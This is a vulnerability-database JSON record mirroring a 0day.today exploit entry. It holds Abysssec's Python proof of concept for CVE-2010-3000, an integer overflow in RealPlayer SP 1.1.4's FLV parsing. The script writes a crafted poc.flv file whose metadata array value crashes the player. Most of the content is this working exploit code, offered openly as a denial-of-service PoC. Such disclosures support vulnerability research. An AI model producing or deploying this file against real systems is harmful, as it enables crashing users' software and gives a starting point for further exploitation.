{"id": "1337DAY-ID-14068", "lastseen": "2018-01-02T13:16:51", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-01-02T13:16:51", "rev": 2}, "dependencies": {"references": [{"type": "oraclelinux", "idList": ["ELSA-2014-3096"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6552", "SECURITYVULNS:DOC:14068"]}], "modified": "2018-01-02T13:16:51", "rev": 2}, "vulnersScore": 0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/14068", "description": "Exploit for windows platform in category dos / poc", "title": "RealPlayer FLV Parsing Integer Overflow", "cvelist": [], "sourceData": "=======================================\r\nRealPlayer FLV Parsing Integer Overflow\r\n=======================================\r\n\r\n=======================================\r\nRealPlayer FLV Parsing Integer Overflow\r\n=======================================\r\n\r\nTitle : RealPlayer FLV Parsing Multiple Integer Overflow\r\nVersion : RealPlayer SP 1.1.4\r\nAnalysis : http://www.abysssec.com\r\nVendor : http://www.real.com\r\nImpact : High\r\nContact : shahin [at] abysssec.com , info [at] abysssec.com\r\nTwitter : @abysssec\r\nCVE : CVE-2010-3000\r\n'''\r\n \r\n \r\n# POC for CVE-2010-3000\r\n# http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/\r\n# http://www.exploit-db.com/sploits/moaub-13-exploit.zip\r\n \r\nimport sys\r\n \r\ndef main():\r\n \r\n flvHeader = '\\x46\\x4C\\x56\\x01\\x05\\x00\\x00\\x00\\x09'\r\n flvBody1 = '\\x00\\x00\\x00\\x00\\x12\\x00\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x0A\\x6F\\x6E\\x4D\\x65\\x74\\x61\\x44\\x61\\x74\\x61\\x08'\r\n HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = \"\\x07\\x50\\x75\\x08\" # if value >= 0x7507508 --> crash\r\n flvBody2 = \"\\x00\\x00\\x09\\x00\\x00\\x00\\x20\"\r\n \r\n flv = open('poc.flv', 'wb+')\r\n flv.write(flvHeader)\r\n flv.write(flvBody1)\r\n flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value)\r\n flv.write(flvBody2)\r\n \r\n flv.close()\r\n print '[-] FLV file generated'\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2010-09-13T00:00:00", "references": [], "reporter": "Abysssec", "modified": "2010-09-13T00:00:00", "href": "https://0day.today/exploit/description/14068", "immutableFields": []}

{}